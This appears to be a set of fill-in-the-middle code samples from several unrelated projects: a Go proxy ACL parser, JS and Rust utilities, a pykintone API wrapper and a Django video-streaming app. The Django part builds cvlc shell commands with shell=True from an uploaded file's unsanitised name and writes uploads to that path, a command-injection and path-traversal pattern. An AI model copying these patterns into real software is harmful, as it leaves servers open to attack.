or range: %s", addr) } a.UserIPRanges = append(a.UserIPRanges, rangeToGroup{r, acl}) } case "user-name": if a.UserNames == nil { a.UserNames = make(map[string][]string) } for _, name := range args { a.UserNames[name] = append(a.UserNames[name], acl) } default: return fmt.Errorf("unknown ACL rule keyword: %s", keyword) } return nil } // load loads ACL definitions and actions from a file. 
func (a *ACLDefinitions) load(filename string) error { f, err := os.Open(filename) if err != nil { return err } defer f.Close() scanner := bufio.NewScanner(f) lineNo := 0 for scanner.Scan() { lineNo++ line := scanner.Text() words := strings.Fields(line) for i, w := range words { if strings.HasPrefix(w, "#") { words = words[:i] break } } if len(words) == 0 { continue } action := words[0] args := words[1:] switch action { case "acl": // Define an ACL. if len(args) < 2 { log.Printf("Incomplete ACL definition at %s, line %d", filename, lineNo) continue } err = a.AddRule(args[0], args[1:]) if err != nil { log.Printf("Error at %s, line %d: %v", filename, lineNo, err) } case "describe": // Give an acl a description for the block page. if len(args) < 2 { log.Printf("Incomplete ACL description at %s, line %d", filename, lineNo) continue } if a.Descriptions == nil { a.Descriptions = make(map[string]string) } a.Descriptions[args[0]] = strings.Join(args[1:], " ") case "include": for _, file := range args { if !filepath.IsAbs(file) { file = filepath.Join(filepath.Dir(filename), file) } err := a.load(file) if err != nil { log.Printf("Error including acl file %s: %v", file, err) } } case "allow", "block", "block-invisible", "censor-words", "disable-proxy-headers", "hash-image", "ignore-category", "phrase-scan", "require-auth", "ssl-bump": r := ACLActionRule{Action: action} argLoop:<|fim▁hole|> case '!': r.Disallowed = append(r.Disallowed, a[1:]) case '"': // Parse a description string. quoted := line[strings.Index(line, a):] _, err := fmt.Sscanf(quoted, "%q", &r.Description) if err != nil { log.Printf("Invalid quoted string at %s, line %d: %q", filename, lineNo, quoted) } break argLoop default: r.Needed = append(r.Needed, a) } } a.Actions = append(a.Actions, r) default: log.Printf("Invalid ACL action at %s, line %d: %s", filename, lineNo, action) } } return scanner.Err() } // requestACLs returns the set of ACLs that apply to r. func (a *ACLDefinitions) requestACLs(r *http.Request, user string) map[string]bool { acls := make(map[string]bool) if host, _, err := net.SplitHostPort(r.RemoteAddr); err == nil { if ip := net.ParseIP(host); ip != nil { for _, a := range a.UserIPAddresses[ip.String()] { acls[a] = true } for _, r := range a.UserIPRanges { if r.r.Contains(ip) { acls[r.group] = true } } } } if user != "" { for _, a := range a.UserNames[user] { acls[a] = true } } for _, a := range a.Methods[r.Method] { acls[a] = true } if r.Method == "CONNECT" { _, port, err := net.SplitHostPort(r.Host) if err != nil { port = "443" } p, err := strconv.Atoi(port) if err != nil { p = 443 } for _, a := range a.ConnectPorts[p] { acls[a] = true } } now := time.Now() for _, t := range a.Times { if t.schedule.Contains(now) { acls[t.acl] = true } } if a.URLs != nil { for match := range a.URLs.MatchingRules(r.URL) { for _, acl := range a.URLTags[match.content] { acls[acl] = true } } if referer := r.Header.Get("Referer"); referer != "" { refURL, err := url.Parse(referer) if err == nil { for match := range a.URLs.MatchingRules(refURL) { for _, acl := range a.Referers[match.content] { acls[acl] = true } } } } } if userAgent := r.Header.Get("User-Agent"); userAgent != "" { for _, u := range a.UserAgents { if u.regexp.MatchString(userAgent) { acls[u.acl] = true } } } return acls } // responseACLs returns the set of ACLs that apply to resp. 
func (a *ACLDefinitions) responseACLs(resp *http.Response) map[string]bool { acls := make(map[string]bool) ct, _, _ := mime.ParseMediaType(resp.Header.Get("Content-Type")) switch ct { case "unknown/unknown", "application/unknown", "*/*", "": // These types tend to be used for content whose type is unknown, // so we should try to second-guess them. preview := make([]byte, 512) n, _ := resp.Body.Read(preview) preview = preview[:n] if n > 0 { ct, _, _ = mime.ParseMediaType(http.DetectContentType(preview)) log.Printf("Detected Content-Type as %q for %v", ct, resp.Request.URL) // Make the preview data available for re-reading. var rc struct { io.Reader io.Closer } rc.Reader = io.MultiReader(bytes.NewReader(preview), resp.Body) rc.Closer = resp.Body resp.Body = rc } } for _, acl := range a.ContentTypes[ct] { acls[acl] = true } slash := strings.Index(ct, "/") if slash != -1 { generic := ct[:slash+1] + "*" for _, acl := range a.ContentTypes[generic] { acls[acl] = true } } status := resp.StatusCode for _, acl := range a.StatusCodes[status] { acls[acl] = true } // Also include the general status code category (multiple of 100). status = status / 100 * 100 for _, acl := range a.StatusCodes[status] { acls[acl] = true } return acls } // An ACLActionRule specifies an action that will be performed if a request // belongs to a certain set of ACLs. type ACLActionRule struct { // Action is the name of the action that will be taken. Action string // Needed is a list of ACLs that the request must belong to. Needed []string // Disallowed is a list of ACLs that the request must not belong to. Disallowed []string // Description is an explanation of why the action was chosen, suitable for // display to end users. Description string } // Conditions returns a string summarizing r's conditions. func (r ACLActionRule) Conditions() string { var desc []string for _, a := range r.Needed { desc = append(desc, a) } for _, a := range r.Disallowed { desc = append(desc, "!"+a) } return strings.Join(desc, " ") } // ChooseACLAction returns the first ACL action rule that // matches acls and has an action in actions. If no rule matches, it returns // a blank rule. func (a *ACLDefinitions) ChooseACLAction(acls map[string]bool, actions ...string) ACLActionRule { choices := make(map[string]bool, len(actions)) for _, a := range actions { choices[a] = true } ruleLoop: for _, r := range a.Actions { if !choices[r.Action] { continue ruleLoop } for _, a := range r.Needed { if !acls[a] { continue ruleLoop } } for _, a := range r.Disallowed { if acls[a] { continue ruleLoop } } return r } return ACLActionRule{} } func copyACLSet(a map[string]bool) map[string]bool { b := make(map[string]bool) for k, v := range a { if v { b[k] = true } } return b } func unionACLSets(sets ...map[string]bool) map[string]bool { b := make(map[string]bool) for _, a := range sets { for k, v := range a { if v { b[k] = true } } } return b } // ChooseACLCategoryAction is like ChooseACLAction, except that it also takes // a list of categories. The first category in the list is added to the set of // ACLs. If the result is empty, the default action for that category will be // used. Then if the result is "ignore-category", the process will be repeated // with the next category in the list. Finally, if all categories are ignored, // the process is repeated with just the original set of ACLs. The second // return value is a list of the categories that were ignored. 
func (c *config) ChooseACLCategoryAction(acls map[string]bool, categories []string, actions ...string) (ar ACLActionRule, ignored []string) { actionsPlus := append(actions, "ignore-category") choices := make(map[string]bool, len(actions)) for _, a := range actions { choices[a] = true } for _, cat := range categories { aclsPlus := copyACLSet(acls) aclsPlus[cat] = true r := c.ACLs.ChooseACLAction(aclsPlus, actionsPlus...) if r.Action == "" { cg := c.Categories[cat] r.Needed = []string{cat} switch cg.action { case BLOCK: if cg.invisible && choices["block-invisible"] { r.Action = "block-invisible" } else if choices["block"] { r.Action = "block" } case IGNORE: r.Action = "ignore-category" case ALLOW: if choices["allow"] { r.Action = "allow" } } } if r.Action == "ignore-category" || r.Action == "" { ignored = append(ignored, cat) } else { return r, ignored } } return c.ACLs.ChooseACLAction(acls, actions...), ignored }<|fim▁end|>
for _, a := range args { switch a[0] {
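ChooseACLAction above is first-match-wins: a rule fires only when every Needed ACL is present and no Disallowed ACL is. The same logic as a small, self-contained Python sketch (the names and sample rules are illustrative, not taken from the Go code):

def choose_action(rules, acls):
    # First rule wins whose needed ACLs are all present and whose
    # disallowed ACLs are all absent; otherwise fall through.
    for rule in rules:
        if all(a in acls for a in rule["needed"]) and \
                not any(a in acls for a in rule["disallowed"]):
            return rule
    return None

rules = [
    {"action": "block", "needed": ["ads"], "disallowed": ["staff"]},
    {"action": "allow", "needed": [], "disallowed": []},
]
print(choose_action(rules, {"ads"})["action"])           # block
print(choose_action(rules, {"ads", "staff"})["action"])  # allow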
<|file_name|>import-aliases.js<|end_file_name|><|fim▁begin|>const path = require('path'); const fs = require('fs'); const { flattenDeep, memoize } = require('lodash'); function locateSourceFile(modulesPath, moduleName, importPath = '') { const srcPrefixes = ['src', '']; const indexFiles = ['', 'index']; const extensions = ['.ts', '.tsx', '.js', '.jsx']; const paths = srcPrefixes.map(prefix => extensions.map(extension => indexFiles.map(indexFile => { return path.join(modulesPath, moduleName, prefix, importPath, indexFile) + extension; }), ), ); return flattenDeep(paths).find(p => fs.existsSync(p)); } function _getAllSpinnakerPackages(modulesPath) { const paths = fs.readdirSync(modulesPath); return paths .map(file => path.join(modulesPath, file)) .filter(child => fs.statSync(child).isDirectory()) .map(packagePath => packagePath.split('/').pop()); } const getAllSpinnakerPackages = memoize(_getAllSpinnakerPackages); function makeResult(pkg, importPath) { const subPkg = getSubPackage(pkg, importPath); importPath = importPath || ''; const importPathWithSlash = importPath ? '/' + importPath : ''; return pkg ? { pkg, subPkg, importPath, importPathWithSlash } : undefined; } /** * Given '@spinnaker/amazon', returns { pkg: 'amazon', path: undefined };<|fim▁hole|>function getImportFromNpm(importString) { const regexp = new RegExp(`^@spinnaker/([^/]+)(/.*)?$`); const [, pkg, importPath] = regexp.exec(importString) || []; return makeResult(pkg, importPath); } /** * If code imports from a known spinnaker package alias * Given 'amazon', returns { pkg: 'amazon', path: undefined }; * Given 'core/deep/import', returns { pkg: 'core', path: 'deep/import' }; * Given 'nonspinnakerpackage/deep/import', returns undefined */ function getAliasImport(allSpinnakerPackages, importString) { const [, pkg, importPath] = /^([^/]+)\/(.*)$/.exec(importString) || []; return allSpinnakerPackages.includes(pkg) ? makeResult(pkg, importPath) : undefined; } /** * If code imports from .. relatively, returns the potential alias * Assume all examples are from a file /app/scripts/modules/core/subdir/file.ts * Given '../../amazon/loadbalancers/loadbalancer', returns { pkg: 'amazon', path: 'loadbalancers/loadbalancer' }; * Given '../widgets/button', returns { pkg: 'core', path: 'widgets/button' }; * Given './file2', returns { pkg: 'core', path: 'subdir/file2' }; */ function getRelativeImport(sourceFileName, modulesPath, importString) { if (!importString.startsWith('../')) { return undefined; } const resolvedPath = path.resolve(sourceFileName, importString); const maybeImport = path.relative(modulesPath, resolvedPath); const [pkg, ...rest] = maybeImport.split(path.sep); return pkg ? 
makeResult(pkg, rest.join('/')) : undefined; } function _getSourceFileDetails(sourceFile) { const [, modulesPath, ownPackage, filePath] = /^(.*app\/scripts\/modules)\/([^/]+)\/(?:src\/)?(.*)$/.exec(sourceFile) || []; const ownSubPackage = getSubPackage(ownPackage, filePath); const sourceDirectory = path.resolve(sourceFile, '..'); return { modulesPath, sourceDirectory, ownPackage, ownSubPackage, filePath }; } function getSubPackage(packageName, filePath) { if (packageName === 'kubernetes') { // subpackage is v1/foo or v2/foo const [, subPkg] = /^((?:v[12]\/)?[^/]+)\/?.*/.exec(filePath) || []; return subPkg; } else { const [, subPkg] = /^([^/]+)\/?.*/.exec(filePath) || []; return subPkg; } } const getSourceFileDetails = memoize(_getSourceFileDetails); module.exports = { getAliasImport, getAllSpinnakerPackages, getImportFromNpm, getRelativeImport, getSourceFileDetails, locateSourceFile, };<|fim▁end|>
* Given '@spinnaker/core/deep/import', returns { pkg: 'core', path: 'deep/import' }; * Given 'anythingelse', returns undefined */
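locateSourceFile above probes every prefix/extension/index-file combination and returns the first path that exists. A hedged Python re-expression of that search: the candidate lists are copied from the JS, empty segments are dropped to mirror Node's path.join, and the function name is a loose translation rather than a real API:

import os
from itertools import product

def locate_source_file(modules_path, module_name, import_path=""):
    src_prefixes = ["src", ""]
    index_files = ["", "index"]
    extensions = [".ts", ".tsx", ".js", ".jsx"]
    for prefix, extension, index_file in product(src_prefixes, extensions, index_files):
        # Node's path.join skips empty segments, so filter them out here too.
        parts = [p for p in (modules_path, module_name, prefix, import_path, index_file) if p]
        candidate = os.path.join(*parts) + extension
        if os.path.exists(candidate):
            return candidate
    return None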
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>// Copyright 2013 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms.<|fim▁hole|> //! Networking I/O pub use self::addrinfo::get_host_addresses; pub mod addrinfo; pub mod tcp; pub mod udp; pub mod ip; // FIXME(#12093) - this should not be called unix pub mod unix;<|fim▁end|>
<|file_name|>fixws.py<|end_file_name|><|fim▁begin|>import sys import glob def read_fileb(filename, mode='rb'): f = open(filename, mode) try: return f.read() finally: f.close() def write_fileb(filename, value, mode='wb'): f = open(filename, mode) try: f.write(value) finally: f.close() for filename in glob.glob(sys.argv[1]): data1 = read_fileb(filename) write_fileb(filename + '.bak2', data1)<|fim▁hole|> ).replace('\t', ' ' * 2) for line in data2lines]) + '\n' write_fileb(filename, data2) print filename, len(data1) - len(data2)<|fim▁end|>
data2lines = read_fileb(filename).strip().split('\n') data2 = '\n'.join([line.rstrip(
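fixws.py above is Python 2. The transform itself (back up the file, strip trailing whitespace, expand tabs to two spaces) is easier to see in a short Python 3 sketch; using pathlib here is an assumption, not something the original does:

from pathlib import Path

def fix_whitespace(path: Path) -> int:
    original = path.read_text()
    # Keep a backup first, as the script above does with its .bak2 copy.
    path.with_name(path.name + ".bak2").write_text(original)
    lines = original.strip().split("\n")
    fixed = "\n".join(line.rstrip().replace("\t", "  ") for line in lines) + "\n"
    path.write_text(fixed)
    return len(original) - len(fixed)  # characters saved, like the final print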
<|file_name|>export.py<|end_file_name|><|fim▁begin|>from pykintone.base_api import BaseAPI import pykintone.user_api.user_api_result as ur class Export(BaseAPI): def __init__(self, account, requests_options=()): super(Export, self).__init__(account=account, requests_options=requests_options) def get_users(self, ids=(), codes=(), offset=-1, size=0): url = "https://{0}.cybozu.com/v1/users.json".format(self.account.domain) params = {} if len(ids) > 0: params["ids"] = ids if len(codes) > 0: params["codes"] = codes if offset > -1: params["offset"] = offset if size > 0: params["size"] = size resp = self._request("GET", url, params_or_data=params) r = ur.GetUsersResult(resp) return r def get_user_organization_titles(self, code): url = "https://{0}.cybozu.com/v1/user/organizations.json".format(self.account.domain) params = { "code": code } resp = self._request("GET", url, params_or_data=params) r = ur.UserOrganizationTitlesResult(resp) return r def get_user_groups(self, code): url = "https://{0}.cybozu.com/v1/user/groups.json".format(self.account.domain) params = { "code": code } <|fim▁hole|><|fim▁end|>
resp = self._request("GET", url, params_or_data=params) r = ur.GetUserGroupsResult(resp) return r
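get_users above only sends a query parameter when the caller overrides a sentinel default (empty tuple, -1, or 0). A standalone sketch of that conditional parameter building with no kintone dependency; the helper name is hypothetical:

def build_user_params(ids=(), codes=(), offset=-1, size=0):
    # A parameter is only included when its sentinel default is overridden.
    params = {}
    if ids:
        params["ids"] = list(ids)
    if codes:
        params["codes"] = list(codes)
    if offset > -1:
        params["offset"] = offset
    if size > 0:
        params["size"] = size
    return params

print(build_user_params(codes=("alice",), size=10))
# {'codes': ['alice'], 'size': 10}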
<|file_name|>normalizer.py<|end_file_name|><|fim▁begin|>#Caleb #normalizes shapes in size and sets the lower left corner to 0 import math def calc_dist(a,b): ax=a[0] ay=a[1] bx=b[0] by=b[1] return math.sqrt((ax-bx)**2+(ay-by)**2) def normalize(shapes): """Normalize shapes >>> normalize([[(0,2.5),(2.5,2.5),(0,0),(2.5,0)],[(0,1),(1,1),(0,0),(1,0)],[(0,1),(1,1),(0,0),(1,0)],[(0,1),(1,1),(0,0),(1,0)],[(0,1),(1,1),(0,0),(1,0)],[(0,1),(1,1),(0,0),(1,0)]])<|fim▁hole|> right=shapes[0] left=shapes[1] top=shapes[2] back=shapes[3] front=shapes[4] bottom=shapes[5] leftscale=calc_dist(front[0],front[2])/calc_dist(left[1],left[3]) topscale=calc_dist(front[0],front[1])/calc_dist(top[2],top[3]) rightscale=calc_dist(front[1],front[3])/calc_dist(right[0],right[2]) bottomscale=calc_dist(front[2],front[3])/calc_dist(bottom[0],bottom[1]) backscale=bottomscale*calc_dist(bottom[2],bottom[3])/calc_dist(back[0],back[1]) scaleFactors=[rightscale,leftscale,topscale,backscale,1,bottomscale] #scale everything by a factor determined by adjacent sides scaledShapes=[] for shape in enumerate(shapes): scaledShape=[] for point in shape[1]: newpoint=tuple([i * scaleFactors[shape[0]] for i in point]) scaledShape.append(newpoint) scaledShapes.append(scaledShape) #normalize to 0 (sets the bottom left corner to 0,0) shiftedShapes=[] for shape in scaledShapes: x=shape[2][0] y=shape[2][1] newShape=[] for point in shape: newpoint=tuple([point[0]-x,point[1]-y]) newShape.append(newpoint) shiftedShapes.append(newShape) return shiftedShapes if __name__ == "__main__": import doctest doctest.testmod()<|fim▁end|>
    [[(0.0, 1.0), (1.0, 1.0), (0.0, 0.0), (1.0, 0.0)], [(0.0, 1.0), (1.0, 1.0), (0.0, 0.0), (1.0, 0.0)], [(0.0, 1.0), (1.0, 1.0), (0.0, 0.0), (1.0, 0.0)], [(0.0, 1.0), (1.0, 1.0), (0.0, 0.0), (1.0, 0.0)], [(0, 1), (1, 1), (0, 0), (1, 0)], [(0.0, 1.0), (1.0, 1.0), (0.0, 0.0), (1.0, 0.0)]]
    """
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>#[macro_use] extern crate serde_derive; extern crate itertools; extern crate clap; use clap::{App, Arg}; mod config; mod subscription; mod util; fn main() { let matches = App::new("podstats") .version("0.2.0") .author("Andrew Michaud <[email protected]") .about("Reads puckfetcher's msgpack cache and provides stats.") .arg( Arg::with_name("config")<|fim▁hole|> .takes_value(true), ) .arg( Arg::with_name("v") .short("v") .multiple(true) .help("Sets the level of verbosity"), ) .get_matches(); println!("Loaded podstats!"); let conf_file = match matches.value_of("config") { Some(c) => Some(c.to_string()), None => None, }; let mut conf = config::Config::new(conf_file); conf.load_cache(); let prompt = util::Prompt {}; let mut menu_options = Vec::new(); menu_options.push("Get names of subscriptions in cache."); menu_options.push("Get entry counts of subscriptions in cache."); menu_options.push("Get sub with highest entry count."); menu_options.push("Get name of sub with highest entry count."); menu_options.push("Get the earliest entry for each sub."); menu_options.push("Get the latest entry for each sub."); loop { let res = prompt.select_from_menu(&menu_options); match res { Some(n) => { println!("{} was provided", n); // TODO provide fns to something to simplify this. match n { 1 => { for (i, item) in conf.get_names().iter().enumerate() { println!("{}: {}", i, item); } } 2 => { for (i, item) in conf.get_entry_counts().iter().enumerate() { println!("{} entry count: {}", i, item); } } 3 => { let item = conf.get_highest_entry_count_sub(); println!("Sub with highest entry count: {}", item); } 4 => { let item = conf.get_highest_entry_count_sub_name(); println!("Name of sub with highest entry count: {}", item); } 5 => { for (i, item) in conf.get_earliest_entry_names().iter().enumerate() { println!("{} earliest entry name: {}", i, item); } } 6 => { for (i, item) in conf.get_latest_entry_names().iter().enumerate() { println!("{} latest entry name: {}", i, item); } } _ => println!("Given invalid option!"), } } None => { println!("Quitting!"); return; } } println!(""); } }<|fim▁end|>
.short("c") .long("config") .value_name("FILE") .help("Sets a custom config file")
<|file_name|>videos.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
__license__ = "GNU Affero General Public License, Ver.3"
__author__ = "Pablo Alvarez de Sotomayor Posadillo"

# This file is part of Kirinki.
#
# Kirinki is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Kirinki is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with kirinki. If not, see <http://www.gnu.org/licenses/>.

# Python general imports
import os
import os.path
import subprocess
import httplib
from datetime import datetime

# Django imports
from django import forms
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.template import RequestContext
from django.template.loader import render_to_string

# Application imports
from kirinki.config import Config
from kirinki.common import ErrorClear
from kirinki.mainviewer import MainViewer<|fim▁hole|>from kirinki.models import video
from kirinki.message import Message
from kirinki.user import LoginForm


class StreamingController():
    '''Class that implements the Streaming controller'''
    def __init__(self, request):
        if request.session.get('isConfig', False) is False:
            Config.getSession(request.session)

        # Left block
        leftBlocks = []
        if not request.session['user'].is_authenticated():
            leftBlocks = [render_to_string('kirinki/section.html', {'title' : 'login', 'content': render_to_string('kirinki/form.html', {'form' : LoginForm(), 'action' : request.session['base_url'] + '/login'}, context_instance=RequestContext(request))})]

        # Center block
        centerBlocks = []
        try:
            videoStr = streaming.objects.all()
            for stream in videoStr:
                centerBlocks = [render_to_string('kirinki/section.html', {'title' : 'login', 'content': str(stream.idStreaming)})]
        except streaming.DoesNotExist:
            pass

        self.render = MainViewer(request).render(leftBlocks, centerBlocks, [])

    def getRender(self):
        '''This method returns the rendered HTML'''
        return self.render

class StrForm(forms.Form):
    isVideo = forms.BooleanField(label='Emitir Video', required=False)
    srcIP = forms.IPAddressField(label='Ip de origen', required=False)
    srcPort = forms.IntegerField(label='Puerto de origen', required=False)
    srcMux = forms.ChoiceField(label='Multiplexor de origen', choices=[('ogg', 'ogg'), ('ffmpeg{mux=flv}', 'mp4'), ('webm', 'webm')], required=False)
    vStream = forms.ChoiceField(label='Video a emitir', choices=[], required=True)

class StreamController():
    '''Class to implement the Stream controller'''
    def __init__(self, request):
        if request.session.get('isConfig', False) is False:
            Config.getSession(request.session)

        if request.method == 'GET':
            # GET request
            form = StrForm(error_class=ErrorClear)
            form.fields['isVideo'].initial = False
            form.fields['srcIP'].initial = request.META['REMOTE_ADDR']
            form.fields['srcPort'].initial = 9000
            form.fields['vStream'].choices = self.userVideos(request)
            self.render = MainViewer(request).render([], [render_to_string('kirinki/form.html', {'form' : form, 'action' : request.session['base_url'] + '/stream', 'id' : 'stream'}, context_instance=RequestContext(request))], [])
        elif request.method == 'POST':
            # POST request
            form = StrForm(request.POST,
error_class=ErrorClear)
            form.fields['isVideo'].initial = False
            form.fields['srcIP'].initial = request.META['REMOTE_ADDR']
            form.fields['srcPort'].initial = 9000
            form.fields['vStream'].choices = self.userVideos(request)
            # Check if the form data is valid and try to start the streaming
            if form.is_valid():
                try:
                    v = video.objects.filter(idVideo=form.cleaned_data['vStream'])[0]
                except (video.DoesNotExist, IndexError):
                    v = None
                if form.cleaned_data['isVideo'] is True and v is not None:
                    cvlc = None
                    if v.format == 'video/mp4':
                        cvlc = subprocess.Popen(["/usr/bin/cvlc " + v.path + " --sout '#http{mux=ffmpeg{mux=flv},dst=" + request.session['strIP'] + ":" + request.session['strPort'] + "/} -no-sout-rtp-sap -no-sout-standard-sap -sout-keep' --ttl 12"], shell=True)
                    elif v.format == 'video/webm':
                        cvlc = subprocess.Popen(["/usr/bin/cvlc " + v.path + " --sout '#http{mux=webm,dst=" + request.session['strIP'] + ":" + request.session['strPort'] + "/} -no-sout-rtp-sap -no-sout-standard-sap -sout-keep' --ttl 12"], shell=True)
                    elif v.format == 'video/ogg':
                        cvlc = subprocess.Popen(["/usr/bin/cvlc " + v.path + " --sout '#http{mux=ogg,dst=" + request.session['strIP'] + ":" + request.session['strPort'] + "/} -no-sout-rtp-sap -no-sout-standard-sap -sout-keep' --ttl 12"], shell=True)
                    else:
                        Message.pushMessage(request, Message.ERROR,'Video type not supported')

                    if cvlc is not None:
                        vStream = streaming(src=form.cleaned_data['srcIP'], port=form.cleaned_data['srcPort'], mux=form.cleaned_data['srcMux'], vMode=form.cleaned_data['isVideo'], pid=cvlc.pid, video=v, owner=request.session['user'])
                        vStream.save()
                        Message.pushMessage(request, Message.INFO,'Video streaming')
                elif form.cleaned_data['isVideo'] is False:
                    if form.cleaned_data['srcMux'] != "ffmpeg{mux=flv}" and form.cleaned_data['srcMux'] != "webm" and form.cleaned_data['srcMux'] != "ogg":
                        Message.pushMessage(request, Message.ERROR,'Video type not supported')
                    else:
                        cvlc = subprocess.Popen(["/usr/bin/cvlc http://" + str(form.cleaned_data['srcIP']) + ":" + str(form.cleaned_data['srcPort']) + " --sout '#http{mux=" + str(form.cleaned_data['srcMux']) + ",dst=" + request.session['strIP'] + ":" + request.session['strPort'] + "/} -no-sout-rtp-sap -no-sout-standard-sap -sout-keep' --ttl 12"], shell=True)
                        vStream = streaming(src=form.cleaned_data['srcIP'], port=form.cleaned_data['srcPort'], mux=form.cleaned_data['srcMux'], vMode=form.cleaned_data['isVideo'], pid=cvlc.pid, video=v, owner=request.session['user'])
                        vStream.save()
                        Message.pushMessage(request, Message.ERROR, 'External video streaming.')
                else:
                    Message.pushMessage(request, Message.ERROR, 'If you select the video mode you must select a video.')
                # os.waitpid(p.pid, 0)[1]
                self.render = HttpResponseRedirect('/streaming')
            else:
                for error in form.errors:
                    Message.pushMessage(request, Message.ERROR, 'Error en ' + error + ': ' + str(form._errors[error]))
                if request.META.get('HTTP_REFERER', False) is not False:
                    self.render = HttpResponseRedirect(request.META['HTTP_REFERER'])
                else:
                    self.render = HttpResponseRedirect('/index')
        else:
            raise Http404

    def userVideos(self, request):
        '''This method returns the videos owned by the current user.'''
        init = []
        try:
            videos = video.objects.filter(owner=request.session['user'])
            for v in videos:
                init.append((v.idVideo, v.name))
        except video.DoesNotExist:
            pass
        return init

    def getRender(self):
        '''This method returns the rendered HTML'''
        return self.render

class VideoController():
    '''Class to implement the Video controller'''

    # Definition of the video actions
    LIST = 0
    VIEW = 1
    DELETE = 2
    REFERENCE = 3

    def __init__(self,
request, action=0, key=None): if request.session.get('isConfig', False) is False: Config.getSession(request.session) # Blocks assigned to the left area leftBlocks = [] if not request.session['user'].is_authenticated(): leftBlocks = [render_to_string('kirinki/section.html', {'title' : 'login', 'content': render_to_string('kirinki/form.html', {'form' : LoginForm(), 'action' : request.session['base_url'] + '/login'}, context_instance=RequestContext(request))})] else: try: myVideos = video.objects.filter(owner = request.session['user']) leftBlocks = [render_to_string('kirinki/section.html', {'title' : 'Mis vídeos', 'content' : render_to_string('kirinki/myVideo.html', {'videos' : myVideos, 'session' : request.session}).encode('utf-8')})] except video.DoesNotExist: pass # Blocks assigned to the center area centerBlocks = [] if action == self.LIST: try: videoList = video.objects.all() centerBlocks = [render_to_string('kirinki/section.html', {'title' : 'Lista de videos', 'content': render_to_string('kirinki/videoList.html', {'videos' : videoList, 'session' : request.session}).encode('utf-8')})] except video.DoesNotExist: pass elif action == self.VIEW: if key is not None: try: v = video.objects.get(idVideo=key) bfile = '/media/'+v.path[v.path.rfind('/')+1:v.path.rfind('.')] src = {'orig' : request.session['base_url'] + '/media/'+v.path[v.path.rfind('/')+1:]} if os.path.exists(v.path[:v.path.rfind('.')]+'.ogv'): src['ogv'] = request.session['base_url'] +bfile+'.ogv' if os.path.exists(v.path[:v.path.rfind('.')]+'.webm'): src['webm'] = request.session['base_url'] +bfile+'.webm' if os.path.exists(v.path[:v.path.rfind('.')]+'.mp4'): src['mp4'] = request.session['base_url'] +bfile+'.mp4' if os.path.exists(v.path[:v.path.rfind('.')]+'.flv'): src['flv'] = request.session['base_url'] +bfile+'.flv' src['flash'] = request.session['base_url']+'/static/flowplayer/flowplayer-3.2.5.swf' src['flash_str'] = request.session['base_url']+'/static/flowplayer.pseudostreaming/flowplayer.pseudostreaming-3.2.5.swf' centerBlocks = [render_to_string('kirinki/section.html', {'title' : v.name, 'content': render_to_string('kirinki/video.html', {'controls' : True, 'src' : src})})] except video.DoesNotExist: pass elif action == self.DELETE: try: v = video.objects.get(idVideo=key, owner=request.session['user']) name = v.name os.remove(v.path) v.delete() centerBlocks = ['<p>Video ' + name + ' deleted.</p>'] except video.DoesNotExist: pass elif action == self.REFERENCE: pass else: # Error. Action not defined raise Http404 # Blocks assigned to the right area # Ultimos subidos, ultimos usuarios que han subido, usuarios que mas han subido, ... rightBlocks = [] self.render = MainViewer(request).render(leftBlocks, centerBlocks, rightBlocks) def getRender(self): '''This method returns the html generated''' return self.render class UploadForm(forms.Form): title = forms.CharField(label='Título', min_length=5, max_length=80, required=True) description = forms.CharField(label='Descripción', min_length=5, max_length=250, required=True) fileUpload = forms.FileField(label='Fichero', required=True) convertMP4 = forms.BooleanField(label='Convertir a mp4', required=False) convertOGG = forms.BooleanField(label='Convertir a ogg', required=False) convertWEBM = forms.BooleanField(label='Convertir a webm', required=False) class UploadController(): '''Class to implement the Upload controller. 
This class will be merged with the VideoController''' def __init__(self, request): if request.session.get('isConfig', False) is False: Config.getSession(request.session) if request.method == 'GET': # GET request leftBlocks = [self.getMyVideos(request.session)] centerBlocks = [self.getUploadVideo(request.session['base_url'], request)] self.render = MainViewer(request).render(leftBlocks, centerBlocks, []) elif request.method == 'POST': # POST request. form = UploadForm(request.POST, request.FILES, error_class=ErrorClear) if form.is_valid(): upFile = request.FILES['fileUpload'] if upFile.size > 0: path = '' if request.session.get('upload_path', False): path = request.session['upload_path']+'/' path += upFile.name destination = open(path, 'wb+') for chunk in upFile.chunks(): destination.write(chunk) destination.close() v = video(name=form.cleaned_data['title'], description=form.cleaned_data['description'], path=path, format=upFile.content_type, pub_date=datetime.now(), owner=request.session['user']) v.save() if form.cleaned_data['convertMP4'] and path[v.path.rfind('.'):].lower() != 'mp4': pass if form.cleaned_data['convertOGG'] and path[v.path.rfind('.'):].lower() != 'ogg': pass if form.cleaned_data['convertWEBM'] and path[v.path.rfind('.'):].lower() != 'web': pass if path[v.path.rfind('.'):].lower() != 'flv': pass else: for error in form.errors: Message.pushMessage(request, Message.ERROR, 'Error en ' + error + ': ' + str(form._errors[error])) if request.META.get('HTTP_REFERER', False) is not False: self.render = HttpResponseRedirect(request.META['HTTP_REFERER']) else: self.render = HttpResponseRedirect('/index') else: raise Http404 def getMyVideos(self, session): '''This method return the videos owned by the actual user.''' content = '' try: myVideos = video.objects.filter(owner = session['user']) content = render_to_string('kirinki/myVideo.html', {'videos' : myVideos, 'session' : session}).encode('utf-8') except video.DoesNotExist: pass return render_to_string('kirinki/section.html', {'title' : 'Mis vídeos', 'content' : content}) def getUploadVideo(self, base_url, request): content = render_to_string('kirinki/form.html', {'form' : UploadForm(request.POST, request.FILES, error_class=ErrorClear), 'action' : base_url + '/upload', 'upload' : True}, context_instance=RequestContext(request)) return render_to_string('kirinki/section.html', {'title' : 'Subir vídeo', 'content' : content}) def getRender(self): '''This method returns the html generated''' return 